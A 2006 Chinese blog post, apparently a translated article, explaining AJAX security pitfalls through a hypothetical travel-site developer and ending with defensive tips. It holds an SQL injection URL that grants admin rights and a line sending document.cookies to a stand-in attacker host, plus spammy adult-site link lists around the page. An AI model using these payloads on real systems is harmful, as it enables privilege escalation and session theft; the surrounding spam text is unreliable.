青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

Welcome to 陳俊峰's ---BeetleHeaded Man Blog !

  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理 ::
  58 隨筆 :: 32 文章 :: 18 評(píng)論 :: 0 Trackbacks
Web開發(fā)者不會(huì)注意到由?“AJAX(Asynchronous?JavaScript?And?XML)”所帶來的激情。不費(fèi)力氣就能創(chuàng)建像Google?Suggest那樣的智能網(wǎng)站或者像Gmail那樣基于Web的應(yīng)用程序,這在很大程度上要?dú)w功于這種技術(shù)。然而,伴隨著AJAX應(yīng)用程序的發(fā)展,我們發(fā)現(xiàn)了它的一些不足之處,我們發(fā)現(xiàn)它的安全漏洞也在逐漸變大,就像慢慢地把基于AJAX的站點(diǎn)放入了一顆定時(shí)炸彈中。


AJAX的好處

在當(dāng)年“Web應(yīng)用程序”的美好時(shí)代,事情非常簡單。你填寫了一個(gè)表單,點(diǎn)擊“提交”按鈕,然后當(dāng)前屏幕就消失了,等待一小會(huì)兒后你就轉(zhuǎn)入到了下一個(gè)頁面。今天的狀況已經(jīng)不是這樣的了,用戶需要的是一種就像任何桌面應(yīng)用程序那樣流暢、快捷和人性化的Web體驗(yàn)。

AJAX經(jīng)常是和DHTML(Dynamic?HTML)一起協(xié)作的,它的順利執(zhí)行需要允許網(wǎng)頁中的JavaScript代碼和web服務(wù)器在后臺(tái)無縫通訊。比方說,當(dāng)你開始在Google?Suggest的搜索框中輸入東西時(shí),web頁面就和服務(wù)器在后臺(tái)開始交換數(shù)據(jù),然后會(huì)給出一些你可能需要的詞條等。所有的這一切都不需要頁面刷新或者按下任何按鈕。同樣這也就是像Gmail那樣的應(yīng)用程序怎么能對(duì)實(shí)時(shí)拼寫檢查做的那么好的原因。

AJAX怎樣工作

AJAX復(fù)雜的原理已經(jīng)超出了今天所要闡述的范圍,這里只簡單描述一下。你的頁面上的JavaScript代碼能夠在不依賴于用戶的情況下和你的Web服務(wù)器取得聯(lián)系。這里面起核心作用的就是JavaScript的XMLHttpRequest對(duì)象,這個(gè)對(duì)象能夠被就像用戶敲擊鍵盤或者時(shí)鐘事件在后臺(tái)或者異步觸發(fā)(也就是術(shù)語異步JavaScript和XML)。

如果你在Google?Suggest中輸入“ajax”后,就會(huì)得到像我輸入后得到的服務(wù)器請(qǐng)求一樣:
1.?www.google.com/complete/search?hl=en&js=true&qu=aj?
2.?www.google.com/complete/search?hl=en&js=true&qu=aja?
3.?www.google.com/complete/search?hl=en&js=true&qu=ajax?

在這個(gè)術(shù)語中的XML部分有一點(diǎn)會(huì)引起人們的誤解,其實(shí)這一部分是沒有任何意義的。它是從JavaScript對(duì)象得來的名字,同時(shí)許多AJAX風(fēng)格的應(yīng)用程序使用了XML,這個(gè)對(duì)象能夠就任何事務(wù)向服務(wù)器發(fā)出一個(gè)請(qǐng)求。甚至JavaScript代碼本身也能夠被取回和評(píng)估。繼續(xù)完成我的輸入“ajax?example”,將會(huì)從Google的服務(wù)器產(chǎn)生下面的回應(yīng):
sendRPCDone(frameElement,?"ajax?example",?new?Array("ajax?example",?"ajax?examples"),?new?Array("153,000?results",?"177,000?results"),?new?Array(""));

這將會(huì)給你一些關(guān)于強(qiáng)大的AJAX的暗示吧,它具有在運(yùn)行中(on?the?fly)把新的JavaScript代碼加入到瀏覽器中的能力。然而,最優(yōu)化的方法看起來好像束縛了XML協(xié)定。舉個(gè)例子說明一下,比如Google產(chǎn)生了下面的這個(gè)東西:
????ajax?example?
????153,000?
????ajax?examples?
????177,000

顯然,你可以在一個(gè)合適的表單中解釋這些XML數(shù)據(jù),但我們要感謝JavaScript,它確實(shí)能夠在一些非常典型的限制條件下和大量討厭的IE?bug環(huán)境里非常好的處理XML對(duì)象。

為了幫助你理解一些Ajax的問題,我在這里給你介紹一個(gè)假想的旅行公司-“時(shí)代尖端旅行公司”。由于受到AJAX?bug的推動(dòng),他們的主要web開發(fā)者M(jìn)ax?Uptime為了創(chuàng)建一個(gè)這樣的應(yīng)用程序,他決定混合使用AJAX,這樣,他走在時(shí)代尖端了。

AJAX的問題

半數(shù)以上的AJAX安全風(fēng)險(xiǎn)來自隱含在服務(wù)器中的漏洞。顯然,使用安全編碼技術(shù)的好的設(shè)計(jì),對(duì)于更安全的AJAX大有幫助,我們需要感謝Max熟悉開放萬維網(wǎng)應(yīng)用安全計(jì)劃(the?Open?Web?Application?Security?Project?-?OWASP)排名前十的最嚴(yán)重web應(yīng)用程序安全漏洞列表(www.owasp.org)。不幸的是,當(dāng)Max實(shí)現(xiàn)AJAX的時(shí)候,他仍然需要面對(duì)許多額外的因素:

1.新的技術(shù):如果Max想把他的站點(diǎn)連接到一個(gè)SQL數(shù)據(jù)庫,他在Google查到了數(shù)百萬的例子。AJAX技術(shù),不管這種技術(shù)有多年輕,它仍然是出現(xiàn)在采購循環(huán)中相對(duì)較早的,盡管它只有很少一部分好的例子出現(xiàn)在網(wǎng)絡(luò)上。為了解決一些難處理的和不必要的復(fù)雜問題,這就要求像Max那樣的開發(fā)者去自主開發(fā)。Max也就不得不編寫服務(wù)器端和客戶端的代碼,創(chuàng)建他自己不太確定的協(xié)議(特別是對(duì)服務(wù)器響應(yīng)來講)。不管這些協(xié)議有多好,都將會(huì)及時(shí)表現(xiàn)在頁面上。

2.非傳統(tǒng)方式的設(shè)計(jì):AJAX有一點(diǎn)點(diǎn)不同于傳統(tǒng)設(shè)計(jì)方式,因?yàn)檫@樣的應(yīng)用程序是半客戶端半服務(wù)端的。在Max的例子里,他是唯一的開發(fā)者,所以他為服務(wù)端和客戶端都能夠進(jìn)行編碼。在同一時(shí)間使用兩種不同的語言(特別是在早期階段)進(jìn)行開發(fā)將會(huì)產(chǎn)生一些初級(jí)的編碼錯(cuò)誤,因?yàn)樗趦啥藖砘靥S,對(duì)一端來講非常好,但可能在另一端不能夠勝任。即使Max有一個(gè)大的開發(fā)團(tuán)隊(duì),安全編碼責(zé)任也可能在服務(wù)端和客戶端開發(fā)小組之間代碼移交的時(shí)候發(fā)生問題。

3.太多的腳本語言:Max憑借他自己的聰明才智決定建立世界上最優(yōu)秀的旅行登記工具。你從輸入你現(xiàn)在的位置(通過郵政編碼、電話區(qū)號(hào)或者GPS等等)開始登記,這時(shí)候一個(gè)AJAX請(qǐng)求就會(huì)被立即發(fā)送來確定你確切的位置。從那時(shí)候開始,屏幕上就會(huì)填入你所有可以利用的旅行方式,這一切甚至都是在你決定你想要去什么地方、你打算什么時(shí)候動(dòng)身和你打算和誰一同去之前就完成的。

這個(gè)屏幕上的單元格和控件都充滿了AJAX驅(qū)動(dòng),服務(wù)器端和客戶端的腳本可能需要超過20個(gè)不同的服務(wù)器調(diào)用。你可以想像一個(gè)很小的個(gè)體服務(wù)器程序,比如findairportsbylocation.aspx?或者?determinemaxbaggageallowancebyairline.php.

顯而易見,如果沒有Max的仔細(xì)計(jì)劃(比如創(chuàng)建多功能的“重載”JavaScript函數(shù)和服務(wù)器腳本),每一次設(shè)計(jì)他都需要?jiǎng)?chuàng)建超過40個(gè)獨(dú)立的部分。更多的編程意味著會(huì)產(chǎn)生更多的錯(cuò)誤和bug,意味著需要更多的時(shí)間去編寫、管理、測試和更新代碼。不僅如此,因?yàn)樵诳蛻舳说腏avaScript代碼中應(yīng)用了大量的這種腳本,他們?cè)谡降某绦驕y試中也容易變得很健忘。

4.確定小部分的AJAX不會(huì)引起危害:這個(gè)站點(diǎn)是一個(gè)計(jì)劃出行的站點(diǎn),但是Max考慮的是它將立刻為你提供一個(gè)顯示精確位置的衛(wèi)星視圖,并且把你所要到達(dá)目的地的天氣情況也提供給你。AJAX最大的誘惑之一看起來好像是直到最后一刻它還在進(jìn)行其它的操作,就像一個(gè)講解員在那里解說一樣,為了AJAX使用了AJAX。當(dāng)Max開始嘗試他的新想法時(shí),他會(huì)逐漸嘗試增加更多新的功能,完全忽視測試的需要。

5.不安全的通訊:每一個(gè)AJAX調(diào)用可能只回傳很少數(shù)量的數(shù)據(jù)給客戶端,但那些數(shù)據(jù)是私有的、保密的。Max可以編寫一個(gè)便利的工具來對(duì)你的信用卡號(hào)碼進(jìn)行數(shù)字校驗(yàn),但是如果使用純文本代替over?SSL進(jìn)行發(fā)送數(shù)據(jù)會(huì)怎樣呢?這是一個(gè)顯而易見的問題,但是當(dāng)有許多例行程序需要考慮,特別是屏幕上其它99%的數(shù)據(jù)不是真正的機(jī)密數(shù)據(jù)時(shí),很容易就會(huì)忽視掉SSL的。

6.服務(wù)器端訪問控制:使用JavaScript程序來觸發(fā)AJAX經(jīng)常會(huì)掩飾一些顯而易見的編碼錯(cuò)誤,服務(wù)器端訪問控制就是一個(gè)例子。假設(shè)Max想?yún)⒖寄闵洗斡斡[的一個(gè)詳細(xì)目的地來為你提供你中意的旅館,他可能會(huì)是像下面這樣:
showprevioushotels.aspx?userid=12345&destination=UK?

這當(dāng)然是非常好的,但是如果一個(gè)惡意用戶把URL改成了如下所示該怎么辦呢:
????showprevioushotels.aspx?userid=12346&destination=%?

他們會(huì)得到其他人最喜愛的旅館嗎?(注意:%在SQL語句中是通配符)。無疑,這是一個(gè)沒有什么危害的例子,但是Max應(yīng)該使用session、cookie或者其它符號(hào)形式來確保數(shù)據(jù)能并且只能發(fā)送到正確的用戶那里。它們可能僅僅是數(shù)據(jù)的一小部分,但它們可能就是最重要的一小部分。

7.服務(wù)器端驗(yàn)證:實(shí)際上這里有兩個(gè)問題。第一,AJAX控制經(jīng)常被用來在用戶最后提交到服務(wù)器之前的輸入驗(yàn)證。這麻痹了Max,使Max有一種虛假的安全感,原因是他建立了稱作alloweddestinations.php的函數(shù),根據(jù)用戶的ID來決定他們能夠到達(dá)的正確目的地。

因?yàn)檫@是一個(gè)服務(wù)器端的檢查,當(dāng)這個(gè)頁面最后被提交的時(shí)候他不必再次為在服務(wù)器上做檢查而煩惱,這里我們假定不會(huì)有惡意的用戶暗中破壞從alloweddestinations.php的響應(yīng)或者破壞對(duì)服務(wù)器最后的請(qǐng)求。

AJAX控制可以比用戶自己更仔細(xì)驗(yàn)證用戶的輸入,但是他們還是經(jīng)常在服務(wù)器上最后做一次驗(yàn)證。

AJAX驗(yàn)證的第二個(gè)問題就是控制本身會(huì)受到驗(yàn)證漏洞的影響。這里再次強(qiáng)調(diào)一下,URL通常是隱藏著的,所以也會(huì)經(jīng)常忘掉它。舉例說明一下,也許我可以使用SQL?Injection來對(duì)剛才的腳本進(jìn)行攻擊,如下所示:
????showprevioushostels.aspx?userid=';?update?users?set?type='admin'?where?userid=12345;--?

就會(huì)讓我登錄后具有系統(tǒng)管理員的權(quán)限。當(dāng)然,如何取得那些表名(table)和字段名已經(jīng)超出了本文討論的范圍,但是你已經(jīng)了解這種情況了,不是嗎?

8.客戶端驗(yàn)證:我們已經(jīng)知道在剛才的Google?Suggest例子中,通過簡單評(píng)測服務(wù)端的響應(yīng)后動(dòng)態(tài)創(chuàng)建和執(zhí)行JavaScript函數(shù)是可行的。如果沒有任何形式的驗(yàn)證(如果這樣的話在客戶端很難保證可靠性和流暢性),客戶端將僅僅簡單執(zhí)行服務(wù)器需要它完成的事情。

這樣的話,由于真正的代碼怎么執(zhí)行的對(duì)于一個(gè)普通用戶來講是永遠(yuǎn)看不到的(也就是說你不能夠“查看源文件”),于是潛在地為惡意的黑客們打開了一個(gè)完全的攻擊導(dǎo)向。如果服務(wù)器的響應(yīng)持續(xù)不斷地被搗亂(這種破壞行為可能是在Web服務(wù)器本身也可能是在數(shù)據(jù)傳輸過程中),這種攻擊將很難被發(fā)現(xiàn)。

Max使用下面的響應(yīng)在目的地網(wǎng)頁上更新天氣圖標(biāo),他是用的函數(shù)是eval();函數(shù):
????updateWeatherIcon('cloudy.gif');

然而,惡意的cracker能夠把這個(gè)函數(shù)變成下面的形式,這樣要發(fā)現(xiàn)這種攻擊就更加困難了:
????updateWeatherIcon('www.myhackingsite.ru/grab.aspx?c='?+?document.cookies);?????updateWeatherIcon('cloudy.gif');

我們現(xiàn)在能夠在我們自己的服務(wù)器上跟蹤每一個(gè)用戶的session?ID/cookie。

小結(jié)

毫無疑問,AJAX和AJAX-style技術(shù)都是通向web設(shè)計(jì)的光明大道。開發(fā)者可以在web上創(chuàng)造出以前從所未有的真正的“應(yīng)用程序”,使用AJAX必須小心謹(jǐn)慎,這樣才能夠保證web站點(diǎn)的安全。

然而,最大的威脅之一,來自日益復(fù)雜的使用AJAX的客戶端腳本和服務(wù)器端腳本。這些腳本被技術(shù)手段隱藏在了視線之外,使測試很不直觀;同時(shí),這種新技術(shù)看起來也使web開發(fā)者忘掉了基本的好的編碼方式。就像訪問控制和輸入校驗(yàn)這樣的問題也不會(huì)消失,它們變得更多更復(fù)雜了。

5個(gè)最重要的AJAX安全提示:

為了取得成功,你必須從好的計(jì)劃開始。必須集中你的才智減少和簡化AJAX調(diào)用,創(chuàng)建一個(gè)標(biāo)準(zhǔn)的響應(yīng)格式,在任何地方都要遵循這個(gè)協(xié)定(理想的XML)。

遵循來自像開放萬維網(wǎng)應(yīng)用安全計(jì)劃那樣的站點(diǎn)的最優(yōu)方法。這里面特別包含了訪問控制和輸入校驗(yàn)漏洞檢查,同時(shí)確保敏感信息使用over?SSL勝過使用普通文本。

永遠(yuǎn)不要假設(shè)服務(wù)器端AJAX對(duì)于訪問控制或者用戶輸入校驗(yàn)檢查能夠代替在服務(wù)器上的最終再檢查。增加AJAX控制永遠(yuǎn)不會(huì)減少你的驗(yàn)證工作量,它們只能增加你的工作量。

永遠(yuǎn)不要假設(shè)客戶端的混淆技術(shù)(obfuscation,在這里指使JavaScript難于閱讀和解碼)能夠保護(hù)你非常重要的商業(yè)秘密。使用JavaScript是隱藏程序設(shè)計(jì)最沒用的一種手段,還能夠?yàn)槟愕膶?duì)手提供好處。

最后,你必須非常好的領(lǐng)導(dǎo)你的開發(fā)團(tuán)隊(duì)。使用AJAX聽起來非常引人注目,但是你應(yīng)該認(rèn)識(shí)到要保留你的開發(fā)團(tuán)隊(duì)以便開發(fā)版本2,當(dāng)然現(xiàn)在你應(yīng)該開發(fā)非常穩(wěn)定的版本1。
posted on 2006-05-12 16:32 Jeff-Chen 閱讀(498) 評(píng)論(0)  編輯 收藏 引用 所屬分類: AJAX

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
網(wǎng)站導(dǎo)航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            最新亚洲一区| 国产精品女主播一区二区三区| 国产欧美三级| 国产麻豆日韩欧美久久| 国产精品嫩草影院av蜜臀| 欧美色视频一区| 国产精品大片wwwwww| 国产精品蜜臀在线观看| 国产自产v一区二区三区c| 红桃视频成人| 日韩一区二区精品葵司在线| 亚洲一区二区三区中文字幕在线| 亚洲美女精品成人在线视频| 午夜精品av| 免费久久99精品国产自| 日韩一级黄色片| 午夜精品一区二区三区在线| 蜜桃av综合| 亚洲人成艺术| 一区二区三区视频免费在线观看| 亚洲欧美国产视频| 久久综合99re88久久爱| 欧美日韩一卡| 亚洲二区精品| 午夜日韩在线观看| 欧美高清在线视频| 亚洲最黄网站| 欧美1区2区| 国产精品羞羞答答| 亚洲裸体视频| 美国成人直播| 亚洲欧美日韩精品久久久久| 欧美极品在线观看| 国内精品亚洲| 亚洲欧美日韩在线一区| 亚洲福利专区| 欧美一区二区精品| 欧美天堂亚洲电影院在线观看 | 亚洲国产精品嫩草影院| 亚洲国产欧美一区二区三区同亚洲| 在线一区二区三区四区| 久久精品一区二区三区四区| 欧美日韩国内| 亚洲国内精品在线| 久久久国产亚洲精品| 亚洲精品在线电影| 国精产品99永久一区一区| 99re6热在线精品视频播放速度| 久久久久.com| 国产一区二区精品久久| 亚洲欧美日韩在线| 亚洲人成小说网站色在线| 久久久久免费视频| 亚洲一区二区三区精品在线| 亚洲伊人伊色伊影伊综合网| 欧美一区视频在线| 亚洲亚洲精品在线观看| 欧美高清日韩| 久久这里有精品视频| 狠狠色噜噜狠狠狠狠色吗综合| 欧美一区二区在线免费播放| 中文国产一区| 国产精品国产三级国产aⅴ无密码| 一区二区三区欧美激情| 亚洲精品欧美极品| 欧美日韩人人澡狠狠躁视频| 日韩一二三区视频| 亚洲国产精品小视频| 欧美成人免费va影院高清| 亚洲黄色有码视频| 久久综合给合久久狠狠色 | 亚洲一区二区不卡免费| 亚洲国产成人精品久久| 麻豆亚洲精品| 亚洲精品美女久久7777777| 亚洲国产一区二区视频| 欧美日韩成人综合天天影院| 亚洲手机在线| 亚洲欧美国产制服动漫| 国产视频亚洲精品| 亚洲久久一区二区| 欧美一区二区三区在线| 亚洲欧美日韩精品久久久| 国产精品热久久久久夜色精品三区| 亚洲影音一区| 亚洲私拍自拍| 国产精品日本欧美一区二区三区| 国模套图日韩精品一区二区| 欧美成人视屏| 欧美日韩性视频在线| 欧美一区二区三区精品电影| 久久久免费观看视频| 亚洲激情自拍| 亚洲欧美国内爽妇网| 亚洲欧洲日韩在线| 亚洲一区二区三区高清| 亚洲高清在线视频| 亚洲精品午夜| 韩国福利一区| 一二三四社区欧美黄| 亚洲第一色中文字幕| 亚洲美女诱惑| 伊人色综合久久天天五月婷| 夜夜嗨av一区二区三区四区 | 久久久国际精品| 在线一区二区三区四区五区| 日韩午夜电影在线观看| 亚洲视频二区| 欧美成人xxx| 亚洲影院免费观看| 国产专区一区| 欧美精品一卡| 欧美91精品| 好看的日韩视频| 牛人盗摄一区二区三区视频| 日韩视频一区二区在线观看 | 久热精品视频在线观看| 欧美激情小视频| 亚洲欧美日韩中文在线制服| 宅男精品视频| 91久久国产综合久久| 影音先锋亚洲视频| 国产私拍一区| 国产午夜精品久久久| 国产精品亚洲综合色区韩国| 欧美视频一区| 国产日韩精品在线| 国产日本精品| 亚洲福利在线视频| 一本色道久久综合精品竹菊| 亚洲日本视频| 亚洲视频精选| 久久在线免费观看| 亚洲国产精品成人| 在线观看亚洲一区| 一本色道久久综合精品竹菊| 午夜在线视频一区二区区别| 蜜臀av一级做a爰片久久| 欧美激情一区二区三区全黄| 一级日韩一区在线观看| 久久久久综合网| 欧美黄色免费网站| 亚洲一区二区不卡免费| 久久久久久伊人| 国产精品一卡二卡| 在线欧美日韩国产| 欧美一级网站| 99视频精品免费观看| 蜜乳av另类精品一区二区| 国产乱码精品一区二区三| 亚洲激情网站| 欧美大秀在线观看| 久久九九热免费视频| 国产主播一区二区| 亚洲在线观看视频| 亚洲精品久久久久久久久久久| 久久激情视频免费观看| 国产精品视频yy9299一区| 亚洲天堂激情| 亚洲亚洲精品三区日韩精品在线视频 | 亚洲精品国产精品国自产在线| 欧美一级播放| 午夜在线一区| 亚洲香蕉网站| 亚洲精品视频免费在线观看| 亚洲综合导航| 黄色精品一区二区| 欧美大片在线观看| 欧美日韩1区2区| 久久精品国亚洲| 免费在线亚洲欧美| 一区二区三区色| 久久疯狂做爰流白浆xx| 亚洲人成网站精品片在线观看| 亚洲欧洲精品成人久久奇米网| 欧美激情视频一区二区三区免费 | 欧美日本在线播放| 亚洲视频免费在线观看| 久久精品青青大伊人av| 亚洲精选视频免费看| 亚洲影院一区| 亚洲精品黄色| 久久精品亚洲| 先锋亚洲精品| 欧美午夜精品理论片a级大开眼界| 久久久久国产精品厨房| 欧美日韩无遮挡| 亚洲国产精品综合| 狠狠v欧美v日韩v亚洲ⅴ| 亚洲一区二区三区乱码aⅴ蜜桃女 亚洲一区二区三区乱码aⅴ | 亚洲专区一二三| 亚洲亚洲精品三区日韩精品在线视频| 久久久www| 欧美成年人网站| 黄色亚洲网站| 久久久久九九九九| 麻豆成人91精品二区三区| 极品裸体白嫩激情啪啪国产精品 | 亚洲影院色无极综合| 欧美日韩高清不卡|